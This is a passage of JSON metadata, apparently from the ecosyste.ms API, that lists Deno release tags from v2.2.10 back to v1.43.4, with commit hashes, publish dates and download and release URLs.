/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/G